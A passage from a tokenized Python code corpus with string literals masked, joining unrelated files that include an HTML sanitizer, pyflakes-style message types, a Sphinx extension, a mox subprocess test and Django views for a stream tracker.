'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:content>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:float>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:left>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:right>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> SAFE_SCHEMES = frozenset ( [ '<STR_LIT:file>' , '<STR_LIT>' , '<STR_LIT:http>' , '<STR_LIT>' , '<STR_LIT>' , None ] ) <EOL> URI_ATTRS = frozenset ( [ '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:src>' ] ) <EOL> def __init__ ( self , safe_tags = SAFE_TAGS , safe_attrs = SAFE_ATTRS , <EOL> safe_schemes = SAFE_SCHEMES , uri_attrs = URI_ATTRS , <EOL> safe_css = SAFE_CSS ) : <EOL> """<STR_LIT>""" <EOL> self . safe_tags = safe_tags <EOL> self . safe_attrs = safe_attrs <EOL> self . safe_css = safe_css <EOL> self . uri_attrs = uri_attrs <EOL> self . safe_schemes = safe_schemes <EOL> _EXPRESSION_SEARCH = re . compile ( """<STR_LIT>""" , re . VERBOSE ) . search <EOL> _URL_FINDITER = re . compile ( <EOL> '<STR_LIT>' ) . 
finditer <EOL> def __call__ ( self , stream ) : <EOL> """<STR_LIT>""" <EOL> waiting_for = None <EOL> for kind , data , pos in stream : <EOL> if kind is START : <EOL> if waiting_for : <EOL> continue <EOL> tag , attrs = data <EOL> if not self . is_safe_elem ( tag , attrs ) : <EOL> waiting_for = tag <EOL> continue <EOL> new_attrs = [ ] <EOL> for attr , value in attrs : <EOL> value = stripentities ( value ) <EOL> if attr not in self . safe_attrs : <EOL> continue <EOL> elif attr in self . uri_attrs : <EOL> if not self . is_safe_uri ( value ) : <EOL> continue <EOL> elif attr == '<STR_LIT>' : <EOL> decls = self . sanitize_css ( value ) <EOL> if not decls : <EOL> continue <EOL> value = '<STR_LIT>' . join ( decls ) <EOL> new_attrs . append ( ( attr , value ) ) <EOL> yield kind , ( tag , Attrs ( new_attrs ) ) , pos <EOL> elif kind is END : <EOL> tag = data <EOL> if waiting_for : <EOL> if waiting_for == tag : <EOL> waiting_for = None <EOL> else : <EOL> yield kind , data , pos <EOL> elif kind is not COMMENT : <EOL> if not waiting_for : <EOL> yield kind , data , pos <EOL> def is_safe_css ( self , propname , value ) : <EOL> """<STR_LIT>""" <EOL> if propname not in self . safe_css : <EOL> return False <EOL> if propname . startswith ( '<STR_LIT>' ) and '<STR_LIT:->' in value : <EOL> return False <EOL> return True <EOL> def is_safe_elem ( self , tag , attrs ) : <EOL> """<STR_LIT>""" <EOL> if tag not in self . safe_tags : <EOL> return False <EOL> if tag . localname == '<STR_LIT:input>' : <EOL> input_type = attrs . get ( '<STR_LIT:type>' , '<STR_LIT>' ) . lower ( ) <EOL> if input_type == '<STR_LIT:password>' : <EOL> return False <EOL> return True <EOL> def is_safe_uri ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:#>' in uri : <EOL> uri = uri . split ( '<STR_LIT:#>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if '<STR_LIT::>' not in uri : <EOL> return True <EOL> chars = [ char for char in uri . split ( '<STR_LIT::>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] if char . 
isalnum ( ) ] <EOL> return '<STR_LIT>' . join ( chars ) . lower ( ) in self . safe_schemes <EOL> def sanitize_css ( self , text ) : <EOL> """<STR_LIT>""" <EOL> decls = [ ] <EOL> text = self . _strip_css_comments ( self . _replace_unicode_escapes ( text ) ) <EOL> for decl in text . split ( '<STR_LIT:;>' ) : <EOL> decl = decl . strip ( ) <EOL> if not decl : <EOL> continue <EOL> try : <EOL> propname , value = decl . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> continue <EOL> if not self . is_safe_css ( propname . strip ( ) . lower ( ) , value . strip ( ) ) : <EOL> continue <EOL> is_evil = False <EOL> if self . _EXPRESSION_SEARCH ( value ) : <EOL> is_evil = True <EOL> for match in self . _URL_FINDITER ( value ) : <EOL> if not self . is_safe_uri ( match . group ( <NUM_LIT:1> ) ) : <EOL> is_evil = True <EOL> break <EOL> if not is_evil : <EOL> decls . append ( decl . strip ( ) ) <EOL> return decls <EOL> _NORMALIZE_NEWLINES = re . compile ( r'<STR_LIT:\r\n>' ) . sub <EOL> _UNICODE_ESCAPE = re . compile ( <EOL> r"""<STR_LIT>""" , <EOL> re . UNICODE ) . sub <EOL> def _replace_unicode_escapes ( self , text ) : <EOL> def _repl ( match ) : <EOL> t = match . group ( <NUM_LIT:1> ) <EOL> if t : <EOL> return chr ( int ( t , <NUM_LIT:16> ) ) <EOL> t = match . group ( <NUM_LIT:2> ) <EOL> if t == '<STR_LIT:\\>' : <EOL> return r'<STR_LIT:\\>' <EOL> else : <EOL> return t <EOL> return self . _UNICODE_ESCAPE ( _repl , self . _NORMALIZE_NEWLINES ( '<STR_LIT:\n>' , text ) ) <EOL> _CSS_COMMENTS = re . compile ( r'<STR_LIT>' ) . sub <EOL> def _strip_css_comments ( self , text ) : <EOL> return self . _CSS_COMMENTS ( '<STR_LIT>' , text ) </s>
<s> def getimagesize ( url ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from PIL import ImageFile <EOL> import urllib . request , urllib . error , urllib . parse <EOL> except ImportError : <EOL> return '<STR_LIT>' <EOL> try : <EOL> p = ImageFile . Parser ( ) <EOL> f = urllib . request . urlopen ( url ) <EOL> while True : <EOL> s = f . read ( <NUM_LIT> ) <EOL> if not s : <EOL> break <EOL> p . feed ( s ) <EOL> if p . image : <EOL> return '<STR_LIT>' % p . image . size <EOL> except ( IOError , ValueError ) : <EOL> return '<STR_LIT>' <EOL> def setup_module ( module ) : <EOL> from nose . plugins . skip import SkipTest <EOL> try : <EOL> from PIL import ImageFile <EOL> except ImportError : <EOL> raise SkipTest ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> import re <EOL> from collections import namedtuple <EOL> from pies . overrides import * <EOL> BY_CODE = { } <EOL> _ERROR_INDEX = <NUM_LIT:100> <EOL> AbstractMessageType = namedtuple ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> class MessageType ( AbstractMessageType ) : <EOL> class Message ( namedtuple ( '<STR_LIT>' , ( '<STR_LIT:message>' , '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' ) ) ) : <EOL> def __str__ ( self ) : <EOL> return self . message <EOL> def __new__ ( cls , error_code , name , template , keyword = '<STR_LIT>' ) : <EOL> global _ERROR_INDEX <EOL> new_instance = AbstractMessageType . __new__ ( cls , error_code , name , template , <EOL> keyword , _ERROR_INDEX ) <EOL> _ERROR_INDEX += <NUM_LIT:1> <EOL> BY_CODE [ error_code ] = new_instance <EOL> return new_instance <EOL> def __call__ ( self , filename , loc = None , * kargs , ** kwargs ) : <EOL> values = { '<STR_LIT:filename>' : filename , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> if loc : <EOL> values [ '<STR_LIT>' ] = loc . lineno <EOL> values [ '<STR_LIT>' ] = getattr ( loc , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> values . update ( kwargs ) <EOL> message = self . template . format ( * kargs , ** values ) <EOL> if kwargs . get ( '<STR_LIT>' , False ) : <EOL> keyword = self . keyword . format ( * kargs , ** values ) <EOL> return self . Message ( '<STR_LIT>' . format ( filename , values [ '<STR_LIT>' ] , values [ '<STR_LIT>' ] , <EOL> self . error_code , keyword , message ) , <EOL> self , values [ '<STR_LIT>' ] , values [ '<STR_LIT>' ] ) <EOL> return self . Message ( '<STR_LIT>' . 
format ( filename , values [ '<STR_LIT>' ] , message ) , <EOL> self , values [ '<STR_LIT>' ] , values [ '<STR_LIT>' ] ) <EOL> class OffsetMessageType ( MessageType ) : <EOL> def __call__ ( self , filename , loc , position = None , * kargs , ** kwargs ) : <EOL> if position : <EOL> kwargs . update ( { '<STR_LIT>' : position [ <NUM_LIT:0> ] , '<STR_LIT>' : position [ <NUM_LIT:1> ] } ) <EOL> return MessageType . __call__ ( self , filename , loc , * kargs , ** kwargs ) <EOL> class SyntaxErrorType ( MessageType ) : <EOL> def __call__ ( self , filename , msg , lineno , offset , text , * kargs , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = lineno <EOL> line = text . splitlines ( ) [ - <NUM_LIT:1> ] <EOL> msg += "<STR_LIT:\n>" + str ( line ) <EOL> if offset is not None : <EOL> offset = offset - ( len ( text ) - len ( line ) ) <EOL> kwargs [ '<STR_LIT>' ] = offset <EOL> msg += "<STR_LIT:\n>" + re . sub ( r'<STR_LIT>' , '<STR_LIT:U+0020>' , line [ : offset ] ) + "<STR_LIT>" <EOL> return MessageType . 
__call__ ( self , filename , None , msg , * kargs , ** kwargs ) <EOL> Message = MessageType ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> UnusedImport = MessageType ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> RedefinedWhileUnused = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> RedefinedInListComp = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> ImportShadowedByLoopVar = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> ImportStarUsed = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , '<STR_LIT:*>' ) <EOL> UndefinedName = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> DoctestSyntaxError = OffsetMessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' ) <EOL> UndefinedExport = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> UndefinedLocal = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> DuplicateArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> Redefined = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> LateFutureImport = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> UnusedVariable = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> MultipleValuesForArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> TooFewArguments = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> TooManyArguments = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> UnexpectedArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> NeedKwOnlyArgument = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> ReturnWithArgsInsideGenerator = MessageType ( '<STR_LIT>' , '<STR_LIT>' , <EOL> "<STR_LIT>" , '<STR_LIT>' ) <EOL> BareExcept = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' ) <EOL> FileSkipped = MessageType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , '<STR_LIT>' ) <EOL> 
PythonSyntaxError = SyntaxErrorType ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> import tornado . ioloop <EOL> import tornado . web <EOL> import json <EOL> class TextHandler ( tornado . web . RequestHandler ) : <EOL> def get ( self ) : <EOL> self . write ( '<STR_LIT>' ) <EOL> application = tornado . web . Application ( [ <EOL> ( r"<STR_LIT>" , TextHandler ) , <EOL> ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> application . listen ( <NUM_LIT> ) <EOL> tornado . ioloop . IOLoop . current ( ) . start ( ) </s>
<s> import sys <EOL> collect_ignore = [ ] <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:5> ) : <EOL> collect_ignore . append ( "<STR_LIT>" ) <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> collect_ignore . append ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> def _atoi ( text ) : <EOL> return int ( text ) if text . isdigit ( ) else text <EOL> def _natural_keys ( text ) : <EOL> return [ _atoi ( c ) for c in re . split ( '<STR_LIT>' , text ) ] <EOL> def nsorted ( to_sort , key = None ) : <EOL> """<STR_LIT>""" <EOL> if key is None : <EOL> key_callback = _natural_keys <EOL> else : <EOL> def key_callback ( item ) : <EOL> return _natural_keys ( key ( item ) ) <EOL> return sorted ( to_sort , key = key_callback ) </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . core . exceptions import PermissionDenied <EOL> def get_owned_object_or_40x ( klass , owner , include_staff = False , <EOL> include_superuser = True , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> obj = get_object_or_404 ( klass , * args , ** kwargs ) <EOL> if obj . is_not_owned_by ( owner , include_staff , include_superuser ) : <EOL> raise PermissionDenied ( ) <EOL> return obj </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os <EOL> import re <EOL> from docutils import nodes , transforms <EOL> from sphinx import addnodes , roles , __version__ as sphinx_ver <EOL> from sphinx . builders . html import StandaloneHTMLBuilder <EOL> from sphinx . writers . html import SmartyPantsHTMLTranslator <EOL> from sphinx . util . console import bold <EOL> from sphinx . util . compat import Directive <EOL> simple_option_desc_re = re . compile ( <EOL> r'<STR_LIT>' ) <EOL> def setup ( app ) : <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> ) <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" <EOL> ) <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" <EOL> ) <EOL> app . add_crossref_type ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> ) <EOL> app . add_description_unit ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> parse_node = parse_django_admin_node , <EOL> ) <EOL> app . add_description_unit ( <EOL> directivename = "<STR_LIT>" , <EOL> rolename = "<STR_LIT>" , <EOL> indextemplate = "<STR_LIT>" , <EOL> parse_node = parse_django_adminopt_node , <EOL> ) <EOL> app . add_config_value ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> app . add_directive ( '<STR_LIT>' , VersionDirective ) <EOL> app . add_directive ( '<STR_LIT>' , VersionDirective ) <EOL> app . add_builder ( DjangoStandaloneHTMLBuilder ) <EOL> class VersionDirective ( Directive ) : <EOL> has_content = True <EOL> required_arguments = <NUM_LIT:1> <EOL> optional_arguments = <NUM_LIT:1> <EOL> final_argument_whitespace = True <EOL> option_spec = { } <EOL> def run ( self ) : <EOL> env = self . state . document . settings . 
env <EOL> arg0 = self . arguments [ <NUM_LIT:0> ] <EOL> is_nextversion = env . config . django_next_version == arg0 <EOL> ret = [ ] <EOL> node = addnodes . versionmodified ( ) <EOL> ret . append ( node ) <EOL> if not is_nextversion : <EOL> if len ( self . arguments ) == <NUM_LIT:1> : <EOL> linktext = '<STR_LIT>' % ( arg0 ) <EOL> xrefs = roles . XRefRole ( ) ( '<STR_LIT>' , linktext , linktext , self . lineno , self . state ) <EOL> node . extend ( xrefs [ <NUM_LIT:0> ] ) <EOL> node [ '<STR_LIT:version>' ] = arg0 <EOL> else : <EOL> node [ '<STR_LIT:version>' ] = "<STR_LIT>" <EOL> node [ '<STR_LIT:type>' ] = self . name <EOL> if len ( self . arguments ) == <NUM_LIT:2> : <EOL> inodes , messages = self . state . inline_text ( self . arguments [ <NUM_LIT:1> ] , self . lineno + <NUM_LIT:1> ) <EOL> node . extend ( inodes ) <EOL> if self . content : <EOL> self . state . nested_parse ( self . content , self . content_offset , node ) <EOL> ret = ret + messages <EOL> env . note_versionchange ( node [ '<STR_LIT:type>' ] , node [ '<STR_LIT:version>' ] , node , self . lineno ) <EOL> return ret <EOL> class DjangoHTMLTranslator ( SmartyPantsHTMLTranslator ) : <EOL> """<STR_LIT>""" <EOL> def visit_table ( self , node ) : <EOL> self . _table_row_index = <NUM_LIT:0> <EOL> self . body . append ( self . starttag ( node , '<STR_LIT>' , CLASS = '<STR_LIT>' ) ) <EOL> def visit_desc_parameterlist ( self , node ) : <EOL> self . body . append ( '<STR_LIT:(>' ) <EOL> self . first_param = <NUM_LIT:1> <EOL> self . param_separator = node . child_text_separator <EOL> def depart_desc_parameterlist ( self , node ) : <EOL> self . body . append ( '<STR_LIT:)>' ) <EOL> if sphinx_ver < '<STR_LIT>' : <EOL> def visit_literal_block ( self , node ) : <EOL> self . no_smarty += <NUM_LIT:1> <EOL> SmartyPantsHTMLTranslator . visit_literal_block ( self , node ) <EOL> def depart_literal_block ( self , node ) : <EOL> SmartyPantsHTMLTranslator . depart_literal_block ( self , node ) <EOL> self . 
no_smarty -= <NUM_LIT:1> <EOL> version_text = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def visit_versionmodified ( self , node ) : <EOL> self . body . append ( <EOL> self . starttag ( node , '<STR_LIT>' , CLASS = node [ '<STR_LIT:type>' ] ) <EOL> ) <EOL> title = "<STR_LIT>" % ( <EOL> self . version_text [ node [ '<STR_LIT:type>' ] ] % node [ '<STR_LIT:version>' ] , <EOL> len ( node ) and "<STR_LIT::>" or "<STR_LIT:.>" <EOL> ) <EOL> self . body . append ( '<STR_LIT>' % title ) <EOL> def depart_versionmodified ( self , node ) : <EOL> self . body . append ( "<STR_LIT>" ) <EOL> def visit_section ( self , node ) : <EOL> old_ids = node . get ( '<STR_LIT>' , [ ] ) <EOL> node [ '<STR_LIT>' ] = [ '<STR_LIT>' + i for i in old_ids ] <EOL> node [ '<STR_LIT>' ] . extend ( old_ids ) <EOL> SmartyPantsHTMLTranslator . visit_section ( self , node ) <EOL> node [ '<STR_LIT>' ] = old_ids <EOL> def parse_django_admin_node ( env , sig , signode ) : <EOL> command = sig . split ( '<STR_LIT:U+0020>' ) [ <NUM_LIT:0> ] <EOL> env . _django_curr_admin_command = command <EOL> title = "<STR_LIT>" % sig <EOL> signode += addnodes . desc_name ( title , title ) <EOL> return sig <EOL> def parse_django_adminopt_node ( env , sig , signode ) : <EOL> """<STR_LIT>""" <EOL> from sphinx . domains . std import option_desc_re <EOL> count = <NUM_LIT:0> <EOL> firstname = '<STR_LIT>' <EOL> for m in option_desc_re . finditer ( sig ) : <EOL> optname , args = m . groups ( ) <EOL> if count : <EOL> signode += addnodes . desc_addname ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT:U+002CU+0020>' ) <EOL> signode += addnodes . desc_name ( optname , optname ) <EOL> signode += addnodes . desc_addname ( args , args ) <EOL> if not count : <EOL> firstname = optname <EOL> count += <NUM_LIT:1> <EOL> if not count : <EOL> for m in simple_option_desc_re . finditer ( sig ) : <EOL> optname , args = m . groups ( ) <EOL> if count : <EOL> signode += addnodes . 
desc_addname ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT:U+002CU+0020>' ) <EOL> signode += addnodes . desc_name ( optname , optname ) <EOL> signode += addnodes . desc_addname ( args , args ) <EOL> if not count : <EOL> firstname = optname <EOL> count += <NUM_LIT:1> <EOL> if not firstname : <EOL> raise ValueError <EOL> return firstname <EOL> class DjangoStandaloneHTMLBuilder ( StandaloneHTMLBuilder ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def finish ( self ) : <EOL> super ( DjangoStandaloneHTMLBuilder , self ) . finish ( ) <EOL> self . info ( bold ( "<STR_LIT>" ) ) <EOL> xrefs = self . env . domaindata [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> templatebuiltins = { <EOL> "<STR_LIT>" : [ n for ( ( t , n ) , ( l , a ) ) in xrefs . items ( ) <EOL> if t == "<STR_LIT>" and l == "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ n for ( ( t , n ) , ( l , a ) ) in xrefs . items ( ) <EOL> if t == "<STR_LIT>" and l == "<STR_LIT>" ] , <EOL> } <EOL> outfilename = os . path . join ( self . outdir , "<STR_LIT>" ) <EOL> with open ( outfilename , '<STR_LIT:wb>' ) as fp : <EOL> fp . write ( '<STR_LIT>' ) <EOL> json . dump ( templatebuiltins , fp ) <EOL> fp . write ( '<STR_LIT>' ) </s>
<s> import cStringIO as StringIO <EOL> import subprocess <EOL> import unittest <EOL> import mox <EOL> import portable_platform <EOL> def subprocess_mock ( mox , * args , ** kw ) : <EOL> mock_process = mox . CreateMock ( subprocess . Popen ) <EOL> mox . StubOutWithMock ( subprocess , '<STR_LIT>' , use_mock_anything = True ) <EOL> subprocess . Popen ( * args , ** kw ) . AndReturn ( <EOL> mock_process ) <EOL> return mock_process <EOL> class ACStatusTest ( mox . MoxTestBase ) : <EOL> acpi_online = """<STR_LIT>""" <EOL> acpi_offline = """<STR_LIT>""" <EOL> def test_offline ( self ) : <EOL> mock_process = subprocess_mock ( self . mox , '<STR_LIT>' , shell = True , stdout = subprocess . PIPE ) <EOL> mock_process . stdout = StringIO . StringIO ( self . acpi_offline ) <EOL> mock_process . communicate ( None ) . AndReturn ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> mock_process . returncode = <NUM_LIT:0> <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( portable_platform . get_ac_status ( ) ) <EOL> def test_online ( self ) : <EOL> mock_process = subprocess_mock ( self . mox , '<STR_LIT>' , shell = True , stdout = subprocess . PIPE ) <EOL> mock_process . stdout = StringIO . StringIO ( self . acpi_online ) <EOL> mock_process . communicate ( None ) . AndReturn ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> mock_process . returncode = <NUM_LIT:0> <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( portable_platform . get_ac_status ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import datetime <EOL> import fcntl <EOL> import hashlib <EOL> import json <EOL> import os <EOL> import random <EOL> import string <EOL> import sys <EOL> import time <EOL> import traceback <EOL> from django import http <EOL> from django . conf import settings <EOL> from django . db import transaction <EOL> from django . shortcuts import render <EOL> from django . views . decorators . cache import never_cache <EOL> from django . views . decorators . csrf import csrf_exempt <EOL> from django import template <EOL> from common . views import NeverCacheRedirectView <EOL> from tracker import models <EOL> config_path = os . path . realpath ( os . path . dirname ( __file__ ) + "<STR_LIT>" ) <EOL> if config_path not in sys . path : <EOL> sys . path . append ( config_path ) <EOL> import config as common_config <EOL> CONFIG = common_config . config_load ( ) <EOL> LOCALIPS = CONFIG [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> class funnydict ( dict ) : <EOL> def __getattr__ ( self , key ) : <EOL> return self [ key ] <EOL> @ never_cache <EOL> def stream ( request , group ) : <EOL> """<STR_LIT>""" <EOL> if not CONFIG . valid ( group ) : <EOL> response = http . HttpResponse ( ) <EOL> response . write ( "<STR_LIT>" ) <EOL> return response <EOL> active_servers = models . Endpoint . active ( group = group ) <EOL> if active_servers : <EOL> your_server = sorted ( active_servers , key = lambda x : x . overall_bitrate ) [ <NUM_LIT:0> ] <EOL> else : <EOL> your_server = None <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) <EOL> @ never_cache <EOL> def streams ( request ) : <EOL> """<STR_LIT>""" <EOL> active_servers = models . Endpoint . active ( ) <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . 
RequestContext ( request ) ) <EOL> @ never_cache <EOL> def endpoint_stats ( request ) : <EOL> """<STR_LIT>""" <EOL> response = http . HttpResponse ( ) <EOL> inactive_servers = [ ] <EOL> active_servers = [ ] <EOL> ten_mins_ago = datetime . datetime . now ( ) - datetime . timedelta ( minutes = <NUM_LIT:10> ) <EOL> endpoints = models . Endpoint . active ( delta = datetime . timedelta ( days = <NUM_LIT:7> ) ) <EOL> for server in endpoints : <EOL> if server . lastseen < ten_mins_ago : <EOL> inactive_servers . append ( server ) <EOL> else : <EOL> active_servers . append ( server ) <EOL> types = list ( sorted ( [ x for x in dir ( models . Endpoint ( ) ) if x . endswith ( '<STR_LIT>' ) ] ) ) <EOL> all_types = list ( sorted ( [ x for x in dir ( models . Endpoint ( ) ) if not x . startswith ( '<STR_LIT:_>' ) ] ) ) <EOL> active_servers = sorted ( active_servers , key = lambda x : ( x . group , x . overall_bitrate ) ) <EOL> active_overall = funnydict ( ( t , sum ( [ <NUM_LIT:0> , getattr ( x , t , None ) ] [ isinstance ( getattr ( x , t , None ) , ( int , float ) ) ] for x in active_servers ) ) for t in all_types ) <EOL> inactive_servers = sorted ( inactive_servers , key = lambda x : ( x . group , x . overall_bitrate ) ) <EOL> inactive_overall = funnydict ( ( t , sum ( [ <NUM_LIT:0> , getattr ( x , t , None ) ] [ isinstance ( getattr ( x , t , None ) , ( int , float ) ) ] for x in inactive_servers ) ) for t in all_types ) <EOL> return render ( request , '<STR_LIT>' , locals ( ) , content_type = '<STR_LIT>' , <EOL> context_instance = template . RequestContext ( request ) ) <EOL> def overall_stats_json ( request ) : <EOL> """<STR_LIT>""" <EOL> graphs = [ ] <EOL> annotations = [ ] <EOL> DEFAULT_RANGE = <NUM_LIT> <EOL> view_range = request . GET . get ( '<STR_LIT>' , DEFAULT_RANGE ) <EOL> try : <EOL> view_range = int ( view_range ) <EOL> except ValueError : <EOL> view_range = DEFAULT_RANGE <EOL> range_start_datetime = datetime . datetime . now ( ) - datetime . 
timedelta ( minutes = view_range ) <EOL> bitrate_graph = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> client_graph = { <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> recent_endpoints = models . Endpoint . objects . filter ( <EOL> lastseen__gte = range_start_datetime , <EOL> lastseen__lte = datetime . datetime . now ( ) <EOL> ) . order_by ( '<STR_LIT>' ) <EOL> endpoints_by_group = { } <EOL> raw_attrs = ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> for endpoint in recent_endpoints : <EOL> if endpoint . group not in endpoints_by_group : <EOL> endpoints_by_group [ endpoint . group ] = [ ] <EOL> endpoint_data = { <EOL> '<STR_LIT>' : int ( endpoint . lastseen . strftime ( '<STR_LIT:%s>' ) ) * <NUM_LIT:1000> , <EOL> } <EOL> for attr in raw_attrs : <EOL> endpoint_data [ attr ] = getattr ( endpoint , attr ) <EOL> endpoints_by_group [ endpoint . group ] . append ( endpoint_data ) <EOL> for group , endpoints in endpoints_by_group . items ( ) : <EOL> bitrate_data = [ ] <EOL> client_data = [ ] <EOL> for point in endpoints : <EOL> bitrate_data . append ( [ point [ '<STR_LIT>' ] , point [ '<STR_LIT>' ] / ( <NUM_LIT> ) ] ) <EOL> client_data . append ( [ point [ '<STR_LIT>' ] , point [ '<STR_LIT>' ] ] ) <EOL> bitrate_graph [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT:label>' : group , <EOL> '<STR_LIT:data>' : bitrate_data , <EOL> } ) <EOL> client_graph [ '<STR_LIT>' ] . append ( { <EOL> 